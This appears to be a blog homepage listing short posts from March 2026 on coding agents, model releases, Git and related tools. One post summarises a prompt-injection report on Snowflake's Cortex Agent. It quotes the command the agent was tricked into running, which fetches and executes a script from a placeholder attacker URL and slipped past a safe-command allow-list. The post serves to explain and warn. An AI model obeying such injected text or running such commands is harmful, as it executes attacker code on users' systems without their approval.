Simon Willison’s Weblog

On rust 105 openclaw 9 anthropic 265 codex-cli 29 http-range-requests 12 ...

 

Entries Links Quotes Notes Guides Elsewhere

March 21, 2026

Profiling Hacker News users based on their comments

Here’s a mildly dystopian prompt I’ve been experimenting with recently: “Profile this user”, accompanied by a copy of their last 1,000 comments on Hacker News.

[... 976 words]

Agentic Engineering Patterns >

Using Git with coding agents

Git is a key tool for working with coding agents. Keeping code in version control lets us record how that code changes over time and investigate and reverse any mistakes. All of the coding agents are fluent in using Git's features, both basic and advanced.

This fluency means we can be more ambitious about how we use Git ourselves. We don't need to memorize how to do things with Git, but staying aware of what's possible means we can take advantage of the full suite of Git's abilities.

Git essentials

Each Git project lives in a repository - a folder on disk that can track changes made to the files within it. Those changes are recorded in commits - timestamped bundles of changes to one or more files accompanied by a commit message describing those changes and an author recording who made them. [... 1,379 words]

# 10:08 pm / coding-agents, generative-ai, github, agentic-engineering, ai, git, llms

March 20, 2026

Turbo Pascal 3.02A, deconstructed. In Things That Turbo Pascal is Smaller Than James Hague lists things (from 2011) that are larger in size than Borland's 1985 Turbo Pascal 3.02 executable - a 39,731 byte file that somehow included a full text editor IDE and Pascal compiler.

This inspired me to track down a copy of that executable (available as freeware since 2000) and see if Claude could interpret the binary and decompile it for me.

It did a great job, so I had it create this interactive artifact illustrating the result. Here's the sequence of prompts I used (in regular claude.ai chat, not Claude Code):

Read this https://prog21.dadgum.com/116.html

Now find a copy of that binary online

Explore this (I attached the zip file)

Build an artifact - no react - that embeds the full turbo.com binary and displays it in a way that helps understand it - broke into labeled segments for different parts of the application, decompiled to visible source code (I guess assembly?) and with that assembly then reconstructed into readable code with extensive annotations

Infographic titled "TURBO.COM" with subtitle "Borland Turbo Pascal 3.02A — September 17, 1986 — Deconstructed" on a dark background. Four statistics are displayed: 39,731 TOTAL BYTES, 17 SEGMENTS MAPPED, 1 INT 21H INSTRUCTION, 100+ BUILT-IN IDENTIFIERS. Below is a "BINARY MEMORY MAP — 0X0100 TO 0X9C33" shown as a horizontal color-coded bar chart with a legend listing 17 segments: COM Header & Copyright, Display Configuration Table, Screen I/O & Video BIOS Routines, Keyboard Input Handler, String Output & Number Formatting, DOS System Call Dispatcher, Runtime Library Core, Error Handler & Runtime Errors, File I/O System, Software Floating-Point Engine, x86 Code Generator, Startup Banner & Main Menu Loop, File Manager & Directory Browser, Compiler Driver & Status, Full-Screen Text Editor, Pascal Parser & Lexer, and Symbol Table & Built-in Identifiers.

Update: Annoyingly the Claude share link doesn't show the actual code that Claude executed, but here's the zip file it gave me when I asked to download all of the intermediate files.

I ran Codex CLI with GPT-5.4 xhigh against that zip file to see if it would spot any obvious hallucinations, and it did not. This project is low-enough stakes that this gave me enough confidence to publish the result!

# 11:59 pm / computer-history, tools, ai, generative-ai, llms, claude

Congrats to the @cursor_ai team on the launch of Composer 2!

We are proud to see Kimi-k2.5 provide the foundation. Seeing our model integrated effectively through Cursor's continued pretraining & high-compute RL training is the open model ecosystem we love to support.

Note: Cursor accesses Kimi-k2.5 via @FireworksAI_HQ hosted RL and inference platform as part of an authorized commercial partnership.

Kimi.ai @Kimi_Moonshot, responding to reports that Composer 2 was built on top of Kimi K2.5

# 8:29 pm / kimi, generative-ai, ai, cursor, llms, ai-in-china

Research SQLite Tags Benchmark: Comparing 5 Tagging Strategies — Benchmarking five tagging strategies in SQLite reveals clear trade-offs between query speed, storage, and implementation complexity for workflows involving tags (100,000 rows, 100 tags, average 6.5 tags/row). Indexed approaches—materialized lookup tables on JSON and classic many-to-many tables—easily outperform others, handling single-tag queries in under 1.5 milliseconds, while raw JSON and LIKE-based solutions are much slower.

March 19, 2026

Research PDF to Image Converter — Leveraging Rust's `pdfium-render` crate and Python's PyO3 bindings, this project enables fast and reliable conversion of PDF pages to JPEG images, packaged as a self-contained Python wheel. The CLI tool and Python library are both built to require no external dependencies, bundling the necessary PDFium binary for ease of installation and cross-platform compatibility.

Thoughts on OpenAI acquiring Astral and uv/ruff/ty

The big news this morning: Astral to join OpenAI (on the Astral blog) and OpenAI to acquire Astral (the OpenAI announcement). Astral are the company behind uv, ruff, and ty—three increasingly load-bearing open source projects in the Python ecosystem. I have thoughts!

[... 1,378 words]

Research REXC (rx) JSON Test Suite — REXC (rx) JSON Test Suite provides a comprehensive, language-agnostic test resource for validating implementations of the REXC encoder/decoder. It includes a single JSON file with 206 tests covering base64 encoding, zigzag integer transformations, value conversions, roundtrip integrity, and special numeric values, ensuring correctness across platforms.

March 18, 2026

Autoresearching Apple’s “LLM in a Flash” to run Qwen 397B locally. Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of Qwen3.5-397B-A17B running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk.

Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed into memory from SSD, saving them from all needing to be held in RAM at the same time.

Dan used techniques described in Apple's 2023 paper LLM in a flash: Efficient Large Language Model Inference with Limited Memory:

This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.

He fed the paper to Claude Code and used a variant of Andrej Karpathy's autoresearch pattern to have Claude run 90 experiments and produce MLX Objective-C and Metal code that ran the model as efficiently as possible.

danveloper/flash-moe has the resulting code plus a PDF paper mostly written by Claude Opus 4.6 describing the experiment in full.

The final model has the experts quantized to 2-bit, but the non-expert parts of the model such as the embedding table and routing matrices are kept at their original precision, adding up to 5.5GB which stays resident in memory while the model is running.

Qwen 3.5 usually runs 10 experts per token, but this setup dropped that to 4 while claiming that the biggest quality drop-off occurred at 3.

It's not clear to me how much the quality of the model results are affected. Claude claimed that "Output quality at 2-bit is indistinguishable from 4-bit for these evaluations", but the description of the evaluations it ran is quite thin.

Update: Dan's latest version upgrades to 4-bit quantization of the experts (209GB on disk, 4.36 tokens/second) after finding that the 2-bit version broke tool calling while 4-bit handles that well.

# 11:56 pm / ai, generative-ai, local-llms, llms, qwen, mlx

Release datasette 1.0a26 — An open source multi-tool for exploring and publishing data

Snowflake Cortex AI Escapes Sandbox and Executes Malware (via) PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed.

The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README.

The attack caused the agent to execute this code:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cortex listed cat commands as safe to run without human approval, without protecting against this form of process substitution that can occur in the body of the command.

I've seen allow-lists against command patterns like this in a bunch of different agent tools and I don't trust them at all - they feel inherently unreliable to me.

I'd rather treat agent commands as if they could do anything that process itself is allowed to do, hence my interest in deterministic sandboxes that operate outside of the layer of the agent itself.

# 5:43 pm / sandboxing, security, ai, prompt-injection, generative-ai, llms

March 17, 2026

Great news—we’ve hit our (very modest) performance goals for the CPython JIT over a year early for macOS AArch64, and a few months early for x86_64 Linux. The 3.15 alpha JIT is about 11-12% faster on macOS AArch64 than the tail calling interpreter, and 5-6%faster than the standard interpreter on x86_64 Linux.

Ken Jin, Python 3.15’s JIT is now back on track

# 9:48 pm / python

GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

Visit GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

OpenAI today: Introducing GPT‑5.4 mini and nano. These models join GPT-5.4 which was released two weeks ago.

[... 717 words]

Release llm 0.29 — Access large language models from the command-line
Research syntaqlite Python Extension — syntaqlite-python-extension is a Python C extension module that integrates the syntaqlite Rust/C SQL toolkit, making high-fidelity SQL parsing, formatting, validation, and tokenization available to Python and Pyodide environments. It wraps syntaqlite's native FFI for both desktop and web, linking against static libraries produced by Rust and employing Emscripten for WASM builds.

If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole. [...]

For a reviewer, it’s demoralizing to communicate with a facade of a human.

This is because contributing to open source, especially Django, is a communal endeavor. Removing your humanity from that experience makes that endeavor more difficult. If you use an LLM to contribute to Django, it needs to be as a complementary tool, not as your vehicle.

Tim Schilling, Give Django your time and money, not your tokens

# 4:13 pm / ai-ethics, open-source, generative-ai, ai, django, llms

Agentic Engineering Patterns >

Subagents

LLMs are restricted by their context limit - how many tokens they can fit in their working memory at any given time. These values have not increased much over the past two years even as the LLMs themselves have seen dramatic improvements in their abilities - they generally top out at around 1,000,000, and benchmarks frequently report better quality results below 200,000.

Carefully managing the context such that it fits within those limits is critical to getting great results out of a model.

Subagents provide a simple but effective way to handle larger tasks without burning through too much of the coding agent’s valuable top-level context. [... 926 words]

# 12:32 pm / parallel-agents, coding-agents, generative-ai, agentic-engineering, ai, llms

March 16, 2026

Introducing Mistral Small 4. Big new release from Mistral today (despite the name) - a new Apache 2 licensed 119B parameter (Mixture-of-Experts, 6B active) model which they describe like this:

Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model.

It supports reasoning_effort="none" or reasoning_effort="high", with the latter providing "equivalent verbosity to previous Magistral models".

The new model is 242GB on Hugging Face.

I tried it out via the Mistral API using llm-mistral:

llm install llm-mistral
llm mistral refresh
llm -m mistral/mistral-small-2603 "Generate an SVG of a pelican riding a bicycle"

The bicycle is upside down and mangled and the pelican is a series of grey curves with a triangular beak.

I couldn't find a way to set the reasoning effort in their API documentation, so hopefully that's a feature which will land soon.

Also from Mistral today and fitting their -stral naming convention is Leanstral, an open weight model that is specifically tuned to help output the Lean 4 formally verifiable coding language. I haven't explored Lean at all so I have no way to credibly evaluate this, but it's interesting to see them target one specific language in this way.

# 11:41 pm / ai, generative-ai, llms, llm, mistral, pelican-riding-a-bicycle, llm-reasoning, llm-release

Use subagents and custom agents in Codex (via) Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag.

They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel.

Codex also lets you define custom agents as TOML files in ~/.codex/agents/. These can have custom instructions and be assigned to use specific models - including gpt-5.3-codex-spark if you want some raw speed. They can then be referenced by name, as demonstrated by this example prompt from the documentation:

Investigate why the settings modal fails to save. Have browser_debugger reproduce it, code_mapper trace the responsible code path, and ui_fixer implement the smallest fix once the failure mode is clear.

The subagents pattern is widely supported in coding agents now. Here's documentation across a number of different platforms:

Update: I added a chapter on Subagents to my Agentic Engineering Patterns guide.

# 11:03 pm / ai, openai, generative-ai, llms, coding-agents, codex-cli, parallel-agents, agentic-engineering

The point of the blackmail exercise was to have something to describe to policymakers—results that are visceral enough to land with people, and make misalignment risk actually salient in practice for people who had never thought about it before.

A member of Anthropic’s alignment-science team, as told to Gideon Lewis-Kraus

# 9:38 pm / ai-ethics, anthropic, claude, generative-ai, ai, llms

Tidbit: the software-based camera indicator light in the MacBook Neo runs in the secure exclave¹ part of the chip, so it is almost as secure as the hardware indicator light. What that means in practice is that even a kernel-level exploit would not be able to turn on the camera without the light appearing on screen. It runs in a privileged environment separate from the kernel and blits the light directly onto the screen hardware.

Guilherme Rambo, in a text message to John Gruber

# 8:34 pm / hardware, apple, privacy, john-gruber

Coding agents for data analysis. Here's the handout I prepared for my NICAR 2026 workshop "Coding agents for data analysis" - a three hour session aimed at data journalists demonstrating ways that tools like Claude Code and OpenAI Codex can be used to explore, analyze and clean data.

Here's the table of contents:

I ran the workshop using GitHub Codespaces and OpenAI Codex, since it was easy (and inexpensive) to distribute a budget-restricted API key for Codex that attendees could use during the class. Participants ended up burning $23 of Codex tokens.

The exercises all used Python and SQLite and some of them used Datasette.

One highlight of the workshop was when we started running Datasette such that it served static content from a viz/ folder, then had Claude Code start vibe coding new interactive visualizations directly in that folder. Here's a heat map it created for my trees database using Leaflet and Leaflet.heat, source code here.

Screenshot of a "Trees SQL Map" web application with the heading "Trees SQL Map" and subheading "Run a query and render all returned points as a heat map. The default query targets roughly 200,000 trees." Below is an input field containing "/trees/-/query.json", a "Run Query" button, and a SQL query editor with the text "SELECT cast(Latitude AS float) AS latitude, cast(Longitude AS float) AS longitude, CASE WHEN DBH IS NULL OR DBH = '' THEN 0.3 WHEN cast(DBH AS float) <= 0 THEN 0.3 WHEN cast(DBH AS float) >= 80 THEN 1.0" (query is truncated). A status message reads "Loaded 1,000 rows and plotted 1,000 points as heat map." Below is a Leaflet/OpenStreetMap interactive map of San Francisco showing a heat map overlay of tree locations, with blue/green clusters concentrated in areas like the Richmond District, Sunset District, and other neighborhoods. Map includes zoom controls and a "Leaflet | © OpenStreetMap contributors" attribution.

I designed the handout to also be useful for people who weren't able to attend the session in person. As is usually the case, material aimed at data journalists is equally applicable to anyone else with data to explore.

# 8:12 pm / data-journalism, geospatial, python, speaking, sqlite, ai, datasette, generative-ai, llms, github-codespaces, nicar, coding-agents, claude-code, codex-cli, leaflet

Agentic Engineering Patterns >

How coding agents work

As with any tool, understanding how coding agents work under the hood can help you make better decisions about how to apply them.

A coding agent is a piece of software that acts as a harness for an LLM, extending that LLM with additional capabilities that are powered by invisible prompts and implemented as callable tools.

Large Language Models

At the heart of any coding agent is a Large Language Model, or LLM. These have names like GPT-5.4 or Claude Opus 4.6 or Gemini 3.1 Pro or Qwen3.5-35B-A3B. [... 1,187 words]

# 2:01 pm / coding-agents, generative-ai, agentic-engineering, ai, llms

March 15, 2026

Museum John M. Mossman Lock Collection — 20 West 44th Street, New York, NY 10036
Combination Lock - catalog page 127, Combination Revolving Bolt Lock, page 130, Combination Lock, also page 130 - each lock is made of brass and looks complicated and robust

Agentic Engineering Patterns >

What is agentic engineering?

I use the term agentic engineering to describe the practice of developing software with the assistance of coding agents.

What are coding agents? They're agents that can both write and execute code. Popular examples include Claude Code, OpenAI Codex, and Gemini CLI.

What's an agent? Clearly defining that term is a challenge that has frustrated AI researchers since at least the 1990s but the definition I've come to accept, at least in the field of Large Language Models (LLMs) like GPT-5 and Gemini and Claude, is this one: [... 617 words]

# 10:41 pm / coding-agents, agent-definitions, generative-ai, agentic-engineering, ai, llms

March 14, 2026

GitHub’s slopocalypse – the flood of AI-generated spam PRs and issues – has made Jazzband’s model of open membership and shared push access untenable.

Jazzband was designed for a world where the worst case was someone accidentally merging the wrong PR. In a world where only 1 in 10 AI-generated PRs meets project standards, where curl had to shut down its bug bounty because confirmation rates dropped below 5%, and where GitHub’s own response was a kill switch to disable pull requests entirely – an organization that gives push access to everyone who joins simply can’t operate safely anymore.

Jannis Leidel, Sunsetting Jazzband

# 6:41 pm / ai-ethics, open-source, python, ai, github

My fireside chat about agentic engineering at the Pragmatic Summit

Visit My fireside chat about agentic engineering at the Pragmatic Summit

I was a speaker last month at the Pragmatic Summit in San Francisco, where I participated in a fireside chat session about Agentic Engineering hosted by Eric Lui from Statsig.

[... 3,350 words]

Research CSRF Protection Demo: Modern Browser-Based Defenses — Modern browser security now enables robust Cross-Site Request Forgery (CSRF) prevention without requiring tokens. This demo project contrasts a vulnerable FastAPI bank app with a protected version, showcasing how browser-sent headers like `Sec-Fetch-Site` and `Origin` empower servers to automatically reject cross-origin POST requests.

March 13, 2026

1M context is now generally available for Opus 4.6 and Sonnet 4.6. Here's what surprised me:

Standard pricing now applies across the full 1M window for both models, with no long-context premium.

OpenAI and Gemini both charge more for prompts where the token count goes above a certain point - 200,000 for Gemini 3.1 Pro and 272,000 for GPT-5.4.

# 6:29 pm / ai, generative-ai, llms, anthropic, claude, llm-pricing, long-context

Highlights

Monthly briefing

Sponsor me for $10/month and get a curated email digest of the month's most important LLM developments.

Pay me to send you less!

Sponsor & subscribe